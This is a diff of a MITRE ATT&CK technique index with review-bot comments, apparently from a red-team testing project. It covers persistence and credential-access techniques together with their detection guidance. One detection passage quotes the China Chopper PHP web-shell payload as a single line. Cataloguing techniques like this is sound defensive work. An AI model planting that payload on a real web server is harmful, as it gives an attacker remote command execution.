- id: attack-pattern--c2dc4e98-ce10-4af8-866f-2187e84466f4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
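Review bot: The top-level key moves from `T1545` to `T1205` and the object's STIX `id` changes from `attack-pattern--c2dc4e98-…` to `attack-pattern--451a9977-…`, with `revoked: false` set on the new object but nothing in the hunk relating the two identifiers; any atomic test or downstream mapping that references `T1545` or the old `attack-pattern--` id would silently stop resolving to this technique. Before merging, grep the test tree and any exported mappings for `T1545` and `c2dc4e98` and remap them to `T1205`, or add a comment above the `T1205:` key such as `# renamed from beta ID T1545 (attack-pattern--c2dc4e98-…); remap any consumers keyed on the old ID`. The description also broadens the technique to an already-open port that only reacts to "the appropriate magic value(s)", which is worth flagging because the existing packet-capture/netflow detection guidance for this entry is written for extraneous packets rather than payload-level triggers inside established flows.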
@@ -15067,24 +15349,26 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T20:14:07.431Z'
- created: '2020-01-22T20:18:16.952Z'
+ modified: '2020-07-01T18:27:41.755Z'
+ created: '2018-04-18T17:59:24.739Z'
+ x_mitre_contributors:
+ - Josh Day, Gigamon
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_platforms:
- Linux
- macOS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Packet capture
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: Record network packets sent to and from the system, looking
for extraneous packets that do not belong to established flows.
x_mitre_defense_bypassed:
- Defensive network service scanning
- x_mitre_permissions_required:
- - User
+ x_mitre_version: '2.0'
x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Josh Day, Gigamon
atomic_tests: []
T1505.002:
technique:
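Review bot: The unchanged `x_mitre_detection` line ("Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows") no longer covers the technique as redefined in the preceding hunk, where a service on an already-open port responds only to a magic value carried inside an otherwise normal connection; such a trigger is part of an established flow, and of the two listed data sources only `Packet capture` can see the payload, while `Netflow/Enclave netflow` cannot. `Windows` is newly added to `x_mitre_platforms` while the description's libpcap/raw-socket discussion is Unix-flavored, so platform-specific detection coverage on Windows is presumably untested here. A reviewer-facing caveat above the detection line, e.g. `# NOTE: netflow alone cannot observe in-band magic values on open ports; full packet capture or host-side socket monitoring is needed for the T1205 open-port variant`, would keep consumers of this index from over-trusting netflow-only coverage.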
@@ -15129,26 +15413,26 @@ persistence:
phase_name: persistence
modified: '2020-03-25T22:59:59.124Z'
created: '2019-12-12T15:08:20.972Z'
- x_mitre_platforms:
- - Linux
- - Windows
- x_mitre_contributors:
- - ESET
- - " Christoffer Strömblad"
- x_mitre_permissions_required:
- - SYSTEM
- - Administrator
- - root
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Application logs
- - File monitoring
x_mitre_detection: Consider monitoring application logs for abnormal behavior
that may indicate suspicious installation of application software components.
Consider monitoring file locations associated with the installation of new
application software components such as paths from which applications typically
load such extensible components.
+ x_mitre_data_sources:
+ - Application logs
+ - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ - Administrator
+ - root
+ x_mitre_contributors:
+ - ESET
+ - " Christoffer Strömblad"
+ x_mitre_platforms:
+ - Linux
+ - Windows
identifier: T1505.002
atomic_tests:
- name: Install MS Exchange Transport Agent Persistence
@@ -15218,22 +15502,22 @@ persistence:
phase_name: persistence
modified: '2020-03-24T16:43:02.273Z'
created: '2020-01-24T14:17:43.906Z'
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
x_mitre_detection: Trap commands must be registered for the shell or programs,
so they appear in files. Monitoring files for suspicious or overly broad trap
commands can narrow down suspicious behavior during an investigation. Monitor
for suspicious processes executed through trap interrupts.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - macOS
+ - Linux
identifier: T1546.005
atomic_tests:
- name: Trap
@@ -15286,31 +15570,13 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- modified: '2020-03-23T21:59:36.955Z'
+ modified: '2020-06-20T22:44:36.043Z'
created: '2017-05-31T21:31:00.645Z'
- x_mitre_version: '2.1'
- x_mitre_data_sources:
- - AWS CloudTrail logs
- - Stackdriver logs
- - Authentication logs
- - Process monitoring
- x_mitre_defense_bypassed:
- - Firewall
- - Host intrusion prevention systems
- - Network intrusion detection system
- - Process whitelisting
- - System access controls
- - Anti-virus
- x_mitre_detection: |-
- Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
-
- Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_effective_permissions:
- - User
- - Administrator
+ x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Netskope
+ - Mark Wee
+ - Praetorian
x_mitre_platforms:
- Linux
- macOS
@@ -15321,11 +15587,29 @@ persistence:
- SaaS
- Office 365
- Azure AD
- x_mitre_contributors:
- - Netskope
- - Mark Wee
- - Praetorian
- x_mitre_is_subtechnique: false
+ x_mitre_effective_permissions:
+ - User
+ - Administrator
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_detection: |-
+ Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+
+ Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.
+ x_mitre_defense_bypassed:
+ - Firewall
+ - Host intrusion prevention systems
+ - Network intrusion detection system
+ - Application control
+ - System access controls
+ - Anti-virus
+ x_mitre_data_sources:
+ - AWS CloudTrail logs
+ - Stackdriver logs
+ - Authentication logs
+ - Process monitoring
+ x_mitre_version: '2.1'
atomic_tests: []
T1505.003:
technique:
@@ -15358,38 +15642,38 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-25T23:10:24.898Z'
+ modified: '2020-04-17T17:47:56.673Z'
created: '2019-12-13T16:46:18.927Z'
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Adversary access to Web server with vulnerability or account to upload and
+ serve the Web shell file.
+ x_mitre_permissions_required:
+ - SYSTEM
+ - User
+ x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
+ of persistent remote access, they do not initiate connections. The portion
+ of the Web shell that is on the server may be small and innocuous looking.
+ The PHP version of the China Chopper Web shell, for example, is the following
+ short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless,
+ detection mechanisms exist. Process monitoring may be used to detect Web servers
+ that perform suspicious actions such as running cmd.exe or accessing files
+ that are not in the Web directory. File monitoring may be used to detect changes
+ to files in the Web directory of a Web server that do not match with updates
+ to the Web server's content and may indicate implantation of a Web shell script.
+ Log authentication attempts to the server and any unusual traffic patterns
+ to or from the server and internal network. (Citation: US-CERT Alert TA15-314A
+ Web Shells) "
x_mitre_data_sources:
- Process monitoring
- Netflow/Enclave netflow
- File monitoring
- Authentication logs
- x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms
- of persistent remote access, they do not initiate connections. The portion
- of the Web shell that is on the server may be small and innocuous looking.
- The PHP version of the China Chopper Web shell, for example, is the following
- short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>
- \n\nNevertheless, detection mechanisms exist. Process monitoring may be used
- to detect Web servers that perform suspicious actions such as running cmd.exe
- or accessing files that are not in the Web directory. File monitoring may
- be used to detect changes to files in the Web directory of a Web server that
- do not match with updates to the Web server's content and may indicate implantation
- of a Web shell script. Log authentication attempts to the server and any unusual
- traffic patterns to or from the server and internal network. (Citation: US-CERT
- Alert TA15-314A Web Shells) "
- x_mitre_permissions_required:
- - SYSTEM
- - User
- x_mitre_system_requirements:
- - Adversary access to Web server with vulnerability or account to upload and
- serve the Web shell file.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
identifier: T1505.003
atomic_tests:
- name: Web Shell Written to Disk
@@ -15436,6 +15720,14 @@ persistence:
description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the
Front Lines. Retrieved May 18, 2016.'
source_name: Mandiant M-Trends 2015
+ - source_name: FireEye WMI SANS 2015
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf
+ description: Devon Kerr. (2015). There's Something About WMI. Retrieved May
+ 4, 2020.
+ - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
+ description: Ballenthin, W., et al. (2015). Windows Management Instrumentation
+ (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.
+ source_name: FireEye WMI 2015
- url: https://www.secureworks.com/blog/wmi-persistence
description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016,
March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016.
@@ -15462,7 +15754,7 @@ persistence:
description: |-
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
- Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+ Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58
@@ -15472,23 +15764,23 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- modified: '2020-03-24T14:58:13.113Z'
+ modified: '2020-05-05T12:02:45.522Z'
created: '2020-01-24T14:07:56.276Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - WMI Objects
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence)
Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - WMI Objects
+ x_mitre_platforms:
+ - Windows
identifier: T1546.003
atomic_tests:
- name: Persistence via WMI Event Subscription
@@ -15583,20 +15875,10 @@ persistence:
phase_name: privilege-escalation
modified: '2020-03-25T22:22:10.041Z'
created: '2020-01-17T19:13:50.402Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- - Travis Smith, Tripwire
- - Pedro Harrison
- x_mitre_data_sources:
- - API monitoring
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- - File monitoring
- - Windows Registry
- x_mitre_effective_permissions:
- - Administrator
- - SYSTEM
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: "Monitor processes and command-line arguments for actions
that could create or modify services. Command-line invocation of tools capable
of adding or modifying services may be unusual, depending on how systems are
@@ -15625,10 +15907,20 @@ persistence:
as part of a chain of behavior that could lead to other activities, such as
network connections made for Command and Control, learning details about the
environment through Discovery, and Lateral Movement."
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_effective_permissions:
+ - Administrator
+ - SYSTEM
+ x_mitre_data_sources:
+ - API monitoring
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
+ - Travis Smith, Tripwire
+ - Pedro Harrison
identifier: T1543.003
atomic_tests:
- name: Modify Fax service to run PowerShell
@@ -15714,26 +16006,16 @@ persistence:
catch {}
T1547.004:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1547.004
- url: https://attack.mitre.org/techniques/T1547/004
- - external_id: CAPEC-579
- source_name: capec
- url: https://capec.mitre.org/data/definitions/579.html
- - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
- description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
- Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
- source_name: Cylance Reg Persistence Sept 2013
- - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
- description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
- Retrieved June 6, 2016.
- source_name: TechNet Autoruns
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Winlogon Helper DLL
- description: "\nAdversaries may abuse features of Winlogon to execute DLLs and/or
+ created: '2020-01-24T16:59:59.688Z'
+ modified: '2020-04-21T16:00:41.277Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ type: attack-pattern
+ id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
+ description: "Adversaries may abuse features of Winlogon to execute DLLs and/or
executables when a user logs in. Winlogon.exe is a Windows component responsible
for actions at logon/logoff as well as the secure attention sequence (SAS)
triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[\\\\Wow6432Node\\\\]\\Microsoft\\Windows
@@ -15749,15 +16031,25 @@ persistence:
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish persistence."
- id: attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- modified: '2020-03-25T16:17:22.487Z'
- created: '2020-01-24T16:59:59.688Z'
+ name: Winlogon Helper DLL
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1547.004
+ url: https://attack.mitre.org/techniques/T1547/004
+ - external_id: CAPEC-579
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/579.html
+ - url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
+ description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
+ Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
+ source_name: Cylance Reg Persistence Sept 2013
+ - url: https://technet.microsoft.com/en-us/sysinternals/bb963902
+ description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
+ Retrieved June 6, 2016.
+ source_name: TechNet Autoruns
x_mitre_platforms:
- Windows
x_mitre_contributors:
@@ -15876,16 +16168,16 @@ credential-access:
phase_name: credential-access
modified: '2020-03-20T15:56:55.022Z'
created: '2020-02-11T18:46:56.263Z'
- x_mitre_platforms:
- - Linux
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - root
x_mitre_detection: The AuditD monitoring tool, which ships stock in many Linux
distributions, can be used to watch for hostile processes attempting to access
/etc/passwd and /etc/shadow, alerting on the pid,
process name, and arguments of such programs.
+ x_mitre_permissions_required:
+ - root
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
atomic_tests: []
T1552.003:
technique:
@@ -15918,21 +16210,21 @@ credential-access:
phase_name: credential-access
modified: '2020-02-07T20:48:49.878Z'
created: '2020-02-04T13:02:11.685Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_data_sources:
- - Process command-line parameters
- - Process monitoring
- - File monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Monitoring when the user's .bash_history is
read can help alert to suspicious activity. While users do typically rely
on their history of commands, they often access this history through other
utilities like "history" instead of commands like cat ~/.bash_history.
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
identifier: T1552.003
atomic_tests:
- name: Search Through Bash History
@@ -15966,15 +16258,9 @@ credential-access:
name: sh
T1110:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1110
- url: https://attack.mitre.org/techniques/T1110
- - external_id: CAPEC-49
- source_name: capec
- url: https://capec.mitre.org/data/definitions/49.html
+ id: attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Brute Force
description: Adversaries may use brute force techniques to gain access to accounts
when passwords are unknown or when password hashes are obtained. Without knowledge
of the password for an account or set of accounts, an adversary may systematically
@@ -15982,14 +16268,20 @@ credential-access:
passwords can take place via interaction with a service that will check the
validity of those credentials or offline against previously acquired credential
data, such as password hashes.
- name: Brute Force
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1110
+ url: https://attack.mitre.org/techniques/T1110
+ - external_id: CAPEC-49
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/49.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-29T20:35:55.382Z'
+ modified: '2020-07-09T17:01:18.302Z'
created: '2017-05-31T21:31:22.767Z'
x_mitre_platforms:
- Linux
@@ -16058,22 +16350,22 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:41:08.996Z'
created: '2020-02-21T15:42:25.991Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - PowerShell logs
- - Process command-line parameters
- - Process monitoring
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
x_mitre_detection: |-
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - PowerShell logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1552.005:
technique:
@@ -16112,23 +16404,23 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T18:18:20.366Z'
created: '2020-02-11T18:47:46.619Z'
- x_mitre_platforms:
- - AWS
- - GCP
- - Azure
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Authentication logs
+ - AWS CloudTrail logs
+ - Azure activity logs
x_mitre_detection: |+
Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained. See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
- x_mitre_data_sources:
- - Authentication logs
- - AWS CloudTrail logs
- - Azure activity logs
- x_mitre_contributors:
- - Praetorian
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1056.004:
technique:
@@ -16209,19 +16501,6 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T21:29:13.565Z'
created: '2020-02-11T19:01:15.930Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
x_mitre_data_sources:
- Windows event logs
- Process monitoring
@@ -16229,6 +16508,19 @@ credential-access:
- DLL monitoring
- Binary file metadata
- API monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1056.004
atomic_tests:
- name: Hook PowerShell TLS Encrypt/Decrypt Messages
@@ -16302,6 +16594,20 @@ credential-access:
phase_name: credential-access
modified: '2020-03-29T20:35:36.694Z'
created: '2020-02-11T18:39:59.959Z'
+ x_mitre_contributors:
+ - Diogo Fernandes
+ - Anastasios Pingios
+ x_mitre_data_sources:
+ - Authentication logs
+ - Office 365 account logs
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: Monitor authentication logs for system and application login
+ failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
+ authentication failures are high, then there may be a brute force attempt
+ to gain access to a system using legitimate credentials.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
@@ -16312,23 +16618,15 @@ credential-access:
- Office 365
- Azure AD
- SaaS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Monitor authentication logs for system and application login
- failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If
- authentication failures are high, then there may be a brute force attempt
- to gain access to a system using legitimate credentials.
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Office 365 account logs
- x_mitre_contributors:
- - Diogo Fernandes
- - Anastasios Pingios
atomic_tests: []
T1552.001:
technique:
+ created: '2020-02-04T12:52:13.006Z'
+ modified: '2020-03-25T18:30:10.630Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc
description: |-
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -16359,32 +16657,6 @@ credential-access:
url: https://posts.specterops.io/head-in-the-clouds-bd038bb69e48
description: Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved
October 4, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-25T18:30:10.630Z'
- created: '2020-02-04T12:52:13.006Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_system_requirements:
- - Access to files
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - User
- x_mitre_detection: 'While detecting adversaries accessing these files may be
- difficult without knowing they exist in the first place, it may be possible
- to detect adversary use of credentials they have obtained. Monitor the command-line
- arguments of executing processes for suspicious words or regular expressions
- that may indicate searching for a password (for example: password, pwd, login,
- secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078)
- for more information.'
- x_mitre_data_sources:
- - Process command-line parameters
- - File monitoring
- x_mitre_contributors:
- - Microsoft Threat Intelligence Center (MSTIC)
x_mitre_platforms:
- Linux
- macOS
@@ -16392,6 +16664,26 @@ credential-access:
- AWS
- GCP
- Azure
+ x_mitre_contributors:
+ - Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - File monitoring
+ x_mitre_detection: 'While detecting adversaries accessing these files may be
+ difficult without knowing they exist in the first place, it may be possible
+ to detect adversary use of credentials they have obtained. Monitor the command-line
+ arguments of executing processes for suspicious words or regular expressions
+ that may indicate searching for a password (for example: password, pwd, login,
+ secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+ for more information.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - User
+ x_mitre_system_requirements:
+ - Access to files
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1552.001
atomic_tests:
- name: Extract Browser and System credentials with LaZagne
@@ -16451,27 +16743,27 @@ credential-access:
elevation_required: true
T1555:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1555
- url: https://attack.mitre.org/techniques/T1555
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Credentials from Password Stores
+ created: '2020-02-11T18:48:28.456Z'
+ modified: '2020-03-25T18:40:15.564Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
+ id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
description: Adversaries may search for common password storage locations to
obtain user credentials. Passwords are stored in several places on a system,
depending on the operating system or application holding the credentials.
There are also specific applications that store passwords to make it easier
for users manage and maintain. Once credentials are obtained, they can be
used to perform lateral movement and access restricted information.
- id: attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0
- type: attack-pattern
- kill_chain_phases:
